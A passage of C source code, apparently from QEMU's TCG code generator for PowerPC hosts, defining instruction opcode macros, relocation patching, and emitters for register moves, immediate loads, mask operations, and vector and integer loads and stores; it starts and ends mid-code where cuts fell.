TCG_REG_R30, TCG_REG_R31 }; static inline bool in_range_b(tcg_target_long target) { return target == sextract64(target, 0, 26); } static uint32_t reloc_pc24_val(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); tcg_debug_assert(in_range_b(disp)); return disp & 0x3fffffc; } static bool reloc_pc24(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); if (in_range_b(disp)) { *pc = (*pc & ~0x3fffffc) | (disp & 0x3fffffc); return true; } return false; } static uint16_t reloc_pc14_val(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); tcg_debug_assert(disp == (int16_t) disp); return disp & 0xfffc; } static bool reloc_pc14(tcg_insn_unit *pc, tcg_insn_unit *target) { ptrdiff_t disp = tcg_ptr_byte_diff(target, pc); if (disp == (int16_t) disp) { *pc = (*pc & ~0xfffc) | (disp & 0xfffc); return true; } return false; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch (*ct_str++) { case 'A': case 'B': case 'C': case 'D': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, 3 + ct_str[0] - 'A'); break; case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'v': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff00000000ull; break; case 'L': /* qemu_ld constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); #ifdef CONFIG_SOFTMMU tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); #endif break; case 'S': /* qemu_st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_R3); #ifdef CONFIG_SOFTMMU tcg_regset_reset_reg(ct->u.regs, TCG_REG_R4); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R5); tcg_regset_reset_reg(ct->u.regs, TCG_REG_R6); #endif break; case 'I': ct->ct |= TCG_CT_CONST_S16; break; case 'J': ct->ct |= TCG_CT_CONST_U16; break; case 'M': ct->ct |= TCG_CT_CONST_MONE; break; case 'T': ct->ct |= TCG_CT_CONST_S32; break; case 'U': ct->ct |= TCG_CT_CONST_U32; break; case 'W': ct->ct |= TCG_CT_CONST_WSZ; break; case 'Z': ct->ct |= TCG_CT_CONST_ZERO; break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } /* The only 32-bit constraint we use aside from TCG_CT_CONST is TCG_CT_CONST_S16. */ if (type == TCG_TYPE_I32) { val = (int32_t)val; } if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { return 1; } else if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { return 1; } else if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { return 1; } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { return 1; } else if ((ct & TCG_CT_CONST_MONE) && val == -1) { return 1; } else if ((ct & TCG_CT_CONST_WSZ) && val == (type == TCG_TYPE_I32 ? 32 : 64)) { return 1; } return 0; } #define OPCD(opc) ((opc)<<26) #define XO19(opc) (OPCD(19)|((opc)<<1)) #define MD30(opc) (OPCD(30)|((opc)<<2)) #define MDS30(opc) (OPCD(30)|((opc)<<1)) #define XO31(opc) (OPCD(31)|((opc)<<1)) #define XO58(opc) (OPCD(58)|(opc)) #define XO62(opc) (OPCD(62)|(opc)) #define VX4(opc) (OPCD(4)|(opc)) #define B OPCD( 18) #define BC OPCD( 16) #define LBZ OPCD( 34) #define LHZ OPCD( 40) #define LHA OPCD( 42) #define LWZ OPCD( 32) #define LWZUX XO31( 55) #define STB OPCD( 38) #define STH OPCD( 44) #define STW OPCD( 36) #define STD XO62( 0) #define STDU XO62( 1) #define STDX XO31(149) #define LD XO58( 0) #define LDX XO31( 21) #define LDU XO58( 1) #define LDUX XO31( 53) #define LWA XO58( 2) #define LWAX XO31(341) #define ADDIC OPCD( 12) #define ADDI OPCD( 14) #define ADDIS OPCD( 15) #define ORI OPCD( 24) #define ORIS OPCD( 25) #define XORI OPCD( 26) #define XORIS OPCD( 27) #define ANDI OPCD( 28) #define ANDIS OPCD( 29) #define MULLI OPCD( 7) #define CMPLI OPCD( 10) #define CMPI OPCD( 11) #define SUBFIC OPCD( 8) #define LWZU OPCD( 33) #define STWU OPCD( 37) #define RLWIMI OPCD( 20) #define RLWINM OPCD( 21) #define RLWNM OPCD( 23) #define RLDICL MD30( 0) #define RLDICR MD30( 1) #define RLDIMI MD30( 3) #define RLDCL MDS30( 8) #define BCLR XO19( 16) #define BCCTR XO19(528) #define CRAND XO19(257) #define CRANDC XO19(129) #define CRNAND XO19(225) #define CROR XO19(449) #define CRNOR XO19( 33) #define EXTSB XO31(954) #define EXTSH XO31(922) #define EXTSW XO31(986) #define ADD XO31(266) #define ADDE XO31(138) #define ADDME XO31(234) #define ADDZE XO31(202) #define ADDC XO31( 10) #define AND XO31( 28) #define SUBF XO31( 40) #define SUBFC XO31( 8) #define SUBFE XO31(136) #define SUBFME XO31(232) #define SUBFZE XO31(200) #define OR XO31(444) #define XOR XO31(316) #define MULLW XO31(235) #define MULHW XO31( 75) #define MULHWU XO31( 11) #define DIVW XO31(491) #define DIVWU XO31(459) #define CMP XO31( 0) #define CMPL XO31( 32) #define LHBRX XO31(790) #define LWBRX XO31(534) #define LDBRX XO31(532) #define STHBRX XO31(918) #define STWBRX XO31(662) #define STDBRX XO31(660) #define MFSPR XO31(339) #define MTSPR XO31(467) #define SRAWI XO31(824) #define NEG XO31(104) #define MFCR XO31( 19) #define MFOCRF (MFCR | (1u << 20)) #define NOR XO31(124) #define CNTLZW XO31( 26) #define CNTLZD XO31( 58) #define CNTTZW XO31(538) #define CNTTZD XO31(570) #define CNTPOPW XO31(378) #define CNTPOPD XO31(506) #define ANDC XO31( 60) #define ORC XO31(412) #define EQV XO31(284) #define NAND XO31(476) #define ISEL XO31( 15) #define MULLD XO31(233) #define MULHD XO31( 73) #define MULHDU XO31( 9) #define DIVD XO31(489) #define DIVDU XO31(457) #define LBZX XO31( 87) #define LHZX XO31(279) #define LHAX XO31(343) #define LWZX XO31( 23) #define STBX XO31(215) #define STHX XO31(407) #define STWX XO31(151) #define EIEIO XO31(854) #define HWSYNC XO31(598) #define LWSYNC (HWSYNC | (1u << 21)) #define SPR(a, b) ((((a)<<5)|(b))<<11) #define LR SPR(8, 0) #define CTR SPR(9, 0) #define SLW XO31( 24) #define SRW XO31(536) #define SRAW XO31(792) #define SLD XO31( 27) #define SRD XO31(539) #define SRAD XO31(794) #define SRADI XO31(413<<1) #define TW XO31( 4) #define TRAP (TW | TO(31)) #define NOP ORI /* ori 0,0,0 */ #define LVX XO31(103) #define LVEBX XO31(7) #define LVEHX XO31(39) #define LVEWX XO31(71) #define LXSDX (XO31(588) | 1) /* v2.06, force tx=1 */ #define LXVDSX (XO31(332) | 1) /* v2.06, force tx=1 */ #define LXSIWZX (XO31(12) | 1) /* v2.07, force tx=1 */ #define LXV (OPCD(61) | 8 | 1) /* v3.00, force tx=1 */ #define LXSD (OPCD(57) | 2) /* v3.00 */ #define LXVWSX (XO31(364) | 1) /* v3.00, force tx=1 */ #define STVX XO31(231) #define STVEWX XO31(199) #define STXSDX (XO31(716) | 1) /* v2.06, force sx=1 */ #define STXSIWX (XO31(140) | 1) /* v2.07, force sx=1 */ #define STXV (OPCD(61) | 8 | 5) /* v3.00, force sx=1 */ #define STXSD (OPCD(61) | 2) /* v3.00 */ #define VADDSBS VX4(768) #define VADDUBS VX4(512) #define VADDUBM VX4(0) #define VADDSHS VX4(832) #define VADDUHS VX4(576) #define VADDUHM VX4(64) #define VADDSWS VX4(896) #define VADDUWS VX4(640) #define VADDUWM VX4(128) #define VADDUDM VX4(192) /* v2.07 */ #define VSUBSBS VX4(1792) #define VSUBUBS VX4(1536) #define VSUBUBM VX4(1024) #define VSUBSHS VX4(1856) #define VSUBUHS VX4(1600) #define VSUBUHM VX4(1088) #define VSUBSWS VX4(1920) #define VSUBUWS VX4(1664) #define VSUBUWM VX4(1152) #define VSUBUDM VX4(1216) /* v2.07 */ #define VNEGW (VX4(1538) | (6 << 16)) /* v3.00 */ #define VNEGD (VX4(1538) | (7 << 16)) /* v3.00 */ #define VMAXSB VX4(258) #define VMAXSH VX4(322) #define VMAXSW VX4(386) #define VMAXSD VX4(450) /* v2.07 */ #define VMAXUB VX4(2) #define VMAXUH VX4(66) #define VMAXUW VX4(130) #define VMAXUD VX4(194) /* v2.07 */ #define VMINSB VX4(770) #define VMINSH VX4(834) #define VMINSW VX4(898) #define VMINSD VX4(962) /* v2.07 */ #define VMINUB VX4(514) #define VMINUH VX4(578) #define VMINUW VX4(642) #define VMINUD VX4(706) /* v2.07 */ #define VCMPEQUB VX4(6) #define VCMPEQUH VX4(70) #define VCMPEQUW VX4(134) #define VCMPEQUD VX4(199) /* v2.07 */ #define VCMPGTSB VX4(774) #define VCMPGTSH VX4(838) #define VCMPGTSW VX4(902) #define VCMPGTSD VX4(967) /* v2.07 */ #define VCMPGTUB VX4(518) #define VCMPGTUH VX4(582) #define VCMPGTUW VX4(646) #define VCMPGTUD VX4(711) /* v2.07 */ #define VCMPNEB VX4(7) /* v3.00 */ #define VCMPNEH VX4(71) /* v3.00 */ #define VCMPNEW VX4(135) /* v3.00 */ #define VSLB VX4(260) #define VSLH VX4(324) #define VSLW VX4(388) #define VSLD VX4(1476) /* v2.07 */ #define VSRB VX4(516) #define VSRH VX4(580) #define VSRW VX4(644) #define VSRD VX4(1732) /* v2.07 */ #define VSRAB VX4(772) #define VSRAH VX4(836) #define VSRAW VX4(900) #define VSRAD VX4(964) /* v2.07 */ #define VRLB VX4(4) #define VRLH VX4(68) #define VRLW VX4(132) #define VRLD VX4(196) /* v2.07 */ #define VMULEUB VX4(520) #define VMULEUH VX4(584) #define VMULEUW VX4(648) /* v2.07 */ #define VMULOUB VX4(8) #define VMULOUH VX4(72) #define VMULOUW VX4(136) /* v2.07 */ #define VMULUWM VX4(137) /* v2.07 */ #define VMSUMUHM VX4(38) #define VMRGHB VX4(12) #define VMRGHH VX4(76) #define VMRGHW VX4(140) #define VMRGLB VX4(268) #define VMRGLH VX4(332) #define VMRGLW VX4(396) #define VPKUHUM VX4(14) #define VPKUWUM VX4(78) #define VAND VX4(1028) #define VANDC VX4(1092) #define VNOR VX4(1284) #define VOR VX4(1156) #define VXOR VX4(1220) #define VEQV VX4(1668) /* v2.07 */ #define VNAND VX4(1412) /* v2.07 */ #define VORC VX4(1348) /* v2.07 */ #define VSPLTB VX4(524) #define VSPLTH VX4(588) #define VSPLTW VX4(652) #define VSPLTISB VX4(780) #define VSPLTISH VX4(844) #define VSPLTISW VX4(908) #define VSLDOI VX4(44) #define XXPERMDI (OPCD(60) | (10 << 3) | 7) /* v2.06, force ax=bx=tx=1 */ #define XXSEL (OPCD(60) | (3 << 4) | 0xf) /* v2.06, force ax=bx=cx=tx=1 */ #define XXSPLTIB (OPCD(60) | (360 << 1) | 1) /* v3.00, force tx=1 */ #define MFVSRD (XO31(51) | 1) /* v2.07, force sx=1 */ #define MFVSRWZ (XO31(115) | 1) /* v2.07, force sx=1 */ #define MTVSRD (XO31(179) | 1) /* v2.07, force tx=1 */ #define MTVSRWZ (XO31(243) | 1) /* v2.07, force tx=1 */ #define MTVSRDD (XO31(435) | 1) /* v3.00, force tx=1 */ #define MTVSRWS (XO31(403) | 1) /* v3.00, force tx=1 */ #define RT(r) ((r)<<21) #define RS(r) ((r)<<21) #define RA(r) ((r)<<16) #define RB(r) ((r)<<11) #define TO(t) ((t)<<21) #define SH(s) ((s)<<11) #define MB(b) ((b)<<6) #define ME(e) ((e)<<1) #define BO(o) ((o)<<21) #define MB64(b) ((b)<<5) #define FXM(b) (1 << (19 - (b))) #define VRT(r) (((r) & 31) << 21) #define VRA(r) (((r) & 31) << 16) #define VRB(r) (((r) & 31) << 11) #define VRC(r) (((r) & 31) << 6) #define LK 1 #define TAB(t, a, b) (RT(t) | RA(a) | RB(b)) #define SAB(s, a, b) (RS(s) | RA(a) | RB(b)) #define TAI(s, a, i) (RT(s) | RA(a) | ((i) & 0xffff)) #define SAI(s, a, i) (RS(s) | RA(a) | ((i) & 0xffff)) #define BF(n) ((n)<<23) #define BI(n, c) (((c)+((n)*4))<<16) #define BT(n, c) (((c)+((n)*4))<<21) #define BA(n, c) (((c)+((n)*4))<<16) #define BB(n, c) (((c)+((n)*4))<<11) #define BC_(n, c) (((c)+((n)*4))<<6) #define BO_COND_TRUE BO(12) #define BO_COND_FALSE BO( 4) #define BO_ALWAYS BO(20) enum { CR_LT, CR_GT, CR_EQ, CR_SO }; static const uint32_t tcg_to_bc[] = { [TCG_COND_EQ] = BC | BI(7, CR_EQ) | BO_COND_TRUE, [TCG_COND_NE] = BC | BI(7, CR_EQ) | BO_COND_FALSE, [TCG_COND_LT] = BC | BI(7, CR_LT) | BO_COND_TRUE, [TCG_COND_GE] = BC | BI(7, CR_LT) | BO_COND_FALSE, [TCG_COND_LE] = BC | BI(7, CR_GT) | BO_COND_FALSE, [TCG_COND_GT] = BC | BI(7, CR_GT) | BO_COND_TRUE, [TCG_COND_LTU] = BC | BI(7, CR_LT) | BO_COND_TRUE, [TCG_COND_GEU] = BC | BI(7, CR_LT) | BO_COND_FALSE, [TCG_COND_LEU] = BC | BI(7, CR_GT) | BO_COND_FALSE, [TCG_COND_GTU] = BC | BI(7, CR_GT) | BO_COND_TRUE, }; /* The low bit here is set if the RA and RB fields must be inverted. */ static const uint32_t tcg_to_isel[] = { [TCG_COND_EQ] = ISEL | BC_(7, CR_EQ), [TCG_COND_NE] = ISEL | BC_(7, CR_EQ) | 1, [TCG_COND_LT] = ISEL | BC_(7, CR_LT), [TCG_COND_GE] = ISEL | BC_(7, CR_LT) | 1, [TCG_COND_LE] = ISEL | BC_(7, CR_GT) | 1, [TCG_COND_GT] = ISEL | BC_(7, CR_GT), [TCG_COND_LTU] = ISEL | BC_(7, CR_LT), [TCG_COND_GEU] = ISEL | BC_(7, CR_LT) | 1, [TCG_COND_LEU] = ISEL | BC_(7, CR_GT) | 1, [TCG_COND_GTU] = ISEL | BC_(7, CR_GT), }; static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_insn_unit *target; int16_t lo; int32_t hi; value += addend; target = (tcg_insn_unit *)value; switch (type) { case R_PPC_REL14: return reloc_pc14(code_ptr, target); case R_PPC_REL24: return reloc_pc24(code_ptr, target); case R_PPC_ADDR16: /* * We are (slightly) abusing this relocation type. In particular, * assert that the low 2 bits are zero, and do not modify them. * That way we can use this with LD et al that have opcode bits * in the low 2 bits of the insn. */ if ((value & 3) || value != (int16_t)value) { return false; } *code_ptr = (*code_ptr & ~0xfffc) | (value & 0xfffc); break; case R_PPC_ADDR32: /* * We are abusing this relocation type. Again, this points to * a pair of insns, lis + load. This is an absolute address * relocation for PPC32 so the lis cannot be removed. */ lo = value; hi = value - lo; if (hi + lo != value) { return false; } code_ptr[0] = deposit32(code_ptr[0], 0, 16, hi >> 16); code_ptr[1] = deposit32(code_ptr[1], 0, 16, lo); break; default: g_assert_not_reached(); } return true; } static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt, TCGReg base, tcg_target_long offset); static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret == arg) { return true; } switch (type) { case TCG_TYPE_I64: tcg_debug_assert(TCG_TARGET_REG_BITS == 64); /* fallthru */ case TCG_TYPE_I32: if (ret < TCG_REG_V0) { if (arg < TCG_REG_V0) { tcg_out32(s, OR | SAB(arg, ret, arg)); break; } else if (have_isa_2_07) { tcg_out32(s, (type == TCG_TYPE_I32 ? MFVSRWZ : MFVSRD) | VRT(arg) | RA(ret)); break; } else { /* Altivec does not support vector->integer moves. */ return false; } } else if (arg < TCG_REG_V0) { if (have_isa_2_07) { tcg_out32(s, (type == TCG_TYPE_I32 ? MTVSRWZ : MTVSRD) | VRT(ret) | RA(arg)); break; } else { /* Altivec does not support integer->vector moves. */ return false; } } /* fallthru */ case TCG_TYPE_V64: case TCG_TYPE_V128: tcg_debug_assert(ret >= TCG_REG_V0 && arg >= TCG_REG_V0); tcg_out32(s, VOR | VRT(ret) | VRA(arg) | VRB(arg)); break; default: g_assert_not_reached(); } return true; } static inline void tcg_out_rld(TCGContext *s, int op, TCGReg ra, TCGReg rs, int sh, int mb) { tcg_debug_assert(TCG_TARGET_REG_BITS == 64); sh = SH(sh & 0x1f) | (((sh >> 5) & 1) << 1); mb = MB64((mb >> 5) | ((mb << 1) & 0x3f)); tcg_out32(s, op | RA(ra) | RS(rs) | sh | mb); } static inline void tcg_out_rlw(TCGContext *s, int op, TCGReg ra, TCGReg rs, int sh, int mb, int me) { tcg_out32(s, op | RA(ra) | RS(rs) | SH(sh) | MB(mb) | ME(me)); } static inline void tcg_out_ext32u(TCGContext *s, TCGReg dst, TCGReg src) { tcg_out_rld(s, RLDICL, dst, src, 0, 32); } static inline void tcg_out_shli32(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rlw(s, RLWINM, dst, src, c, 0, 31 - c); } static inline void tcg_out_shli64(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rld(s, RLDICR, dst, src, c, 63 - c); } static inline void tcg_out_shri32(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rlw(s, RLWINM, dst, src, 32 - c, c, 31); } static inline void tcg_out_shri64(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rld(s, RLDICL, dst, src, 64 - c, c); } /* Emit a move into ret of arg, if it can be done in one insn. */ static bool tcg_out_movi_one(TCGContext *s, TCGReg ret, tcg_target_long arg) { if (arg == (int16_t)arg) { tcg_out32(s, ADDI | TAI(ret, 0, arg)); return true; } if (arg == (int32_t)arg && (arg & 0xffff) == 0) { tcg_out32(s, ADDIS | TAI(ret, 0, arg >> 16)); return true; } return false; } static void tcg_out_movi_int(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg, bool in_prologue) { intptr_t tb_diff; tcg_target_long tmp; int shift; tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { arg = (int32_t)arg; } /* Load 16-bit immediates with one insn. */ if (tcg_out_movi_one(s, ret, arg)) { return; } /* Load addresses within the TB with one insn. */ tb_diff = arg - (intptr_t)s->code_gen_ptr; if (!in_prologue && USE_REG_TB && tb_diff == (int16_t)tb_diff) { tcg_out32(s, ADDI | TAI(ret, TCG_REG_TB, tb_diff)); return; } /* Load 32-bit immediates with two insns. Note that we've already eliminated bare ADDIS, so we know both insns are required. */ if (TCG_TARGET_REG_BITS == 32 || arg == (int32_t)arg) { tcg_out32(s, ADDIS | TAI(ret, 0, arg >> 16)); tcg_out32(s, ORI | SAI(ret, ret, arg)); return; } if (arg == (uint32_t)arg && !(arg & 0x8000)) { tcg_out32(s, ADDI | TAI(ret, 0, arg)); tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16)); return; } /* Load masked 16-bit value. */ if (arg > 0 && (arg & 0x8000)) { tmp = arg | 0x7fff; if ((tmp & (tmp + 1)) == 0) { int mb = clz64(tmp + 1) + 1; tcg_out32(s, ADDI | TAI(ret, 0, arg)); tcg_out_rld(s, RLDICL, ret, ret, 0, mb); return; } } /* Load common masks with 2 insns. */ shift = ctz64(arg); tmp = arg >> shift; if (tmp == (int16_t)tmp) { tcg_out32(s, ADDI | TAI(ret, 0, tmp)); tcg_out_shli64(s, ret, ret, shift); return; } shift = clz64(arg); if (tcg_out_movi_one(s, ret, arg << shift)) { tcg_out_shri64(s, ret, ret, shift); return; } /* Load addresses within 2GB of TB with 2 (or rarely 3) insns. */ if (!in_prologue && USE_REG_TB && tb_diff == (int32_t)tb_diff) { tcg_out_mem_long(s, ADDI, ADD, ret, TCG_REG_TB, tb_diff); return; } /* Use the constant pool, if possible. */ if (!in_prologue && USE_REG_TB) { new_pool_label(s, arg, R_PPC_ADDR16, s->code_ptr, -(intptr_t)s->code_gen_ptr); tcg_out32(s, LD | TAI(ret, TCG_REG_TB, 0)); return; } tmp = arg >> 31 >> 1; tcg_out_movi(s, TCG_TYPE_I32, ret, tmp); if (tmp) { tcg_out_shli64(s, ret, ret, 32); } if (arg & 0xffff0000) { tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16)); } if (arg & 0xffff) { tcg_out32(s, ORI | SAI(ret, ret, arg)); } } static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long val) { uint32_t load_insn; int rel, low; intptr_t add; low = (int8_t)val; if (low >= -16 && low < 16) { if (val == (tcg_target_long)dup_const(MO_8, low)) { tcg_out32(s, VSPLTISB | VRT(ret) | ((val & 31) << 16)); return; } if (val == (tcg_target_long)dup_const(MO_16, low)) { tcg_out32(s, VSPLTISH | VRT(ret) | ((val & 31) << 16)); return; } if (val == (tcg_target_long)dup_const(MO_32, low)) { tcg_out32(s, VSPLTISW | VRT(ret) | ((val & 31) << 16)); return; } } if (have_isa_3_00 && val == (tcg_target_long)dup_const(MO_8, val)) { tcg_out32(s, XXSPLTIB | VRT(ret) | ((val & 0xff) << 11)); return; } /* * Otherwise we must load the value from the constant pool. */ if (USE_REG_TB) { rel = R_PPC_ADDR16; add = -(intptr_t)s->code_gen_ptr; } else { rel = R_PPC_ADDR32; add = 0; } if (have_vsx) { load_insn = type == TCG_TYPE_V64 ? LXSDX : LXVDSX; load_insn |= VRT(ret) | RB(TCG_REG_TMP1); if (TCG_TARGET_REG_BITS == 64) { new_pool_label(s, val, rel, s->code_ptr, add); } else { new_pool_l2(s, rel, s->code_ptr, add, val, val); } } else { load_insn = LVX | VRT(ret) | RB(TCG_REG_TMP1); if (TCG_TARGET_REG_BITS == 64) { new_pool_l2(s, rel, s->code_ptr, add, val, val); } else { new_pool_l4(s, rel, s->code_ptr, add, val, val, val, val); } } if (USE_REG_TB) { tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, 0, 0)); load_insn |= RA(TCG_REG_TB); } else { tcg_out32(s, ADDIS | TAI(TCG_REG_TMP1, 0, 0)); tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, TCG_REG_TMP1, 0)); } tcg_out32(s, load_insn); } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: tcg_debug_assert(ret < TCG_REG_V0); tcg_out_movi_int(s, type, ret, arg, false); break; case TCG_TYPE_V64: case TCG_TYPE_V128: tcg_debug_assert(ret >= TCG_REG_V0); tcg_out_dupi_vec(s, type, ret, arg); break; default: g_assert_not_reached(); } } static bool mask_operand(uint32_t c, int *mb, int *me) { uint32_t lsb, test; /* Accept a bit pattern like: 0....01....1 1....10....0 0..01..10..0 Keep track of the transitions. */ if (c == 0 || c == -1) { return false; } test = c; lsb = test & -test; test += lsb; if (test & (test - 1)) { return false; } *me = clz32(lsb); *mb = test ? clz32(test & -test) + 1 : 0; return true; } static bool mask64_operand(uint64_t c, int *mb, int *me) { uint64_t lsb; if (c == 0) { return false; } lsb = c & -c; /* Accept 1..10..0. */ if (c == -lsb) { *mb = 0; *me = clz64(lsb); return true; } /* Accept 0..01..1. */ if (lsb == 1 && (c & (c + 1)) == 0) { *mb = clz64(c + 1) + 1; *me = 63; return true; } return false; } static void tcg_out_andi32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) { int mb, me; if (mask_operand(c, &mb, &me)) { tcg_out_rlw(s, RLWINM, dst, src, 0, mb, me); } else if ((c & 0xffff) == c) { tcg_out32(s, ANDI | SAI(src, dst, c)); return; } else if ((c & 0xffff0000) == c) { tcg_out32(s, ANDIS | SAI(src, dst, c >> 16)); return; } else { tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R0, c); tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0)); } } static void tcg_out_andi64(TCGContext *s, TCGReg dst, TCGReg src, uint64_t c) { int mb, me; tcg_debug_assert(TCG_TARGET_REG_BITS == 64); if (mask64_operand(c, &mb, &me)) { if (mb == 0) { tcg_out_rld(s, RLDICR, dst, src, 0, me); } else { tcg_out_rld(s, RLDICL, dst, src, 0, mb); } } else if ((c & 0xffff) == c) { tcg_out32(s, ANDI | SAI(src, dst, c)); return; } else if ((c & 0xffff0000) == c) { tcg_out32(s, ANDIS | SAI(src, dst, c >> 16)); return; } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, c); tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0)); } } static void tcg_out_zori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c, int op_lo, int op_hi) { if (c >> 16) { tcg_out32(s, op_hi | SAI(src, dst, c >> 16)); src = dst; } if (c & 0xffff) { tcg_out32(s, op_lo | SAI(src, dst, c)); src = dst; } } static void tcg_out_ori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) { tcg_out_zori32(s, dst, src, c, ORI, ORIS); } static void tcg_out_xori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) { tcg_out_zori32(s, dst, src, c, XORI, XORIS); } static void tcg_out_b(TCGContext *s, int mask, tcg_insn_unit *target) { ptrdiff_t disp = tcg_pcrel_diff(s, target); if (in_range_b(disp)) { tcg_out32(s, B | (disp & 0x3fffffc) | mask); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, (uintptr_t)target); tcg_out32(s, MTSPR | RS(TCG_REG_R0) | CTR); tcg_out32(s, BCCTR | BO_ALWAYS | mask); } } static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt, TCGReg base, tcg_target_long offset) { tcg_target_long orig = offset, l0, l1, extra = 0, align = 0; bool is_int_store = false; TCGReg rs = TCG_REG_TMP1; switch (opi) { case LD: case LWA: align = 3; /* FALLTHRU */ default: if (rt > TCG_REG_R0 && rt < TCG_REG_V0) { rs = rt; break; } break; case LXSD: case STXSD: align = 3; break; case LXV: case STXV: align = 15; break; case STD: align = 3; /* FALLTHRU */ case STB: case STH: case STW: is_int_store = true; break; } /* For unaligned, or very large offsets, use the indexed form. */ if (offset & align || offset != (int32_t)offset || opi == 0) { if (rs == base) { rs = TCG_REG_R0; } tcg_debug_assert(!is_int_store || rs != rt); tcg_out_movi(s, TCG_TYPE_PTR, rs, orig); tcg_out32(s, opx | TAB(rt & 31, base, rs)); return; } l0 = (int16_t)offset; offset = (offset - l0) >> 16; l1 = (int16_t)offset; if (l1 < 0 && orig >= 0) { extra = 0x4000; l1 = (int16_t)(offset - 0x4000); } if (l1) { tcg_out32(s, ADDIS | TAI(rs, base, l1)); base = rs; } if (extra) { tcg_out32(s, ADDIS | TAI(rs, base, extra)); base = rs; } if (opi != ADDI || base != rt || l0 != 0) { tcg_out32(s, opi | TAI(rt & 31, base, l0)); } } static void tcg_out_vsldoi(TCGContext *s, TCGReg ret, TCGReg va, TCGReg vb, int shb) { tcg_out32(s, VSLDOI | VRT(ret) | VRA(va) | VRB(vb) | (shb << 6)); } static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg base, intptr_t offset) { int shift; switch (type) { case TCG_TYPE_I32: if (ret < TCG_REG_V0) { tcg_out_mem_long(s, LWZ, LWZX, ret, base, offset); break; } if (have_isa_2_07 && have_vsx) { tcg_out_mem_long(s, 0, LXSIWZX, ret, base, offset); break; } tcg_debug_assert((offset & 3) == 0); tcg_out_mem_long(s, 0, LVEWX, ret, base, offset); shift = (offset - 4) & 0xc; if (shift) { tcg_out_vsldoi(s, ret, ret, ret, shift); } break; case TCG_TYPE_I64: if (ret < TCG_REG_V0) { tcg_debug_assert(TCG_TARGET_REG_BITS == 64); tcg_out_mem_long(s, LD, LDX, ret, base, offset); break; } /* fallthru */ case TCG_TYPE_V64: tcg_debug_assert(ret >= TCG_REG_V0); if (have_vsx) { tcg_out_mem_long(s, have_isa_3_00 ? LXSD : 0, LXSDX, ret, base, offset); break; } tcg_debug_assert((offset & 7) == 0); tcg_out_mem_long(s, 0, LVX, ret, base, offset & -16); if (offset & 8) { tcg_out_vsldoi(s, ret, ret, ret, 8); } break; case TCG_TYPE_V128: tcg_debug_assert(ret >= TCG_REG_V0); tcg_debug_assert((offset & 15) == 0); tcg_out_mem_long(s, have_isa_3_00 ? LXV : 0, LVX, ret, base, offset); break; default: g_assert_not_reached(); } } static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg base, intptr_t offset) { int shift; switch (type) { case TCG_TYPE_I32: if (arg < TCG_REG_V0) { tcg_out_mem_long(s, STW, STWX, arg, base, offset); break; } if (have_isa_2_07 && have_vsx) { tcg_out_mem_long(s, 0, STXSIWX, arg, base, offset); break; } assert((offset & 3) == 0); tcg_debug_assert((offset & 3) == 0); shift = (offset - 4) & 0xc; if (shift) { tcg_out_vsldoi(s, TCG_VEC_TMP1, arg, arg, shift); arg = TCG_VEC_TMP1; } tcg_out_mem_long(s, 0, STVEWX, arg, base, offset); break; case TCG_TYPE_I64: if (arg < TCG_REG_V0) { tcg_debug_assert(TCG_TARGET_REG_BITS == 64); tcg_out_mem_long(s, STD, STDX, arg, base, offset); break; } /* fallthru */ case 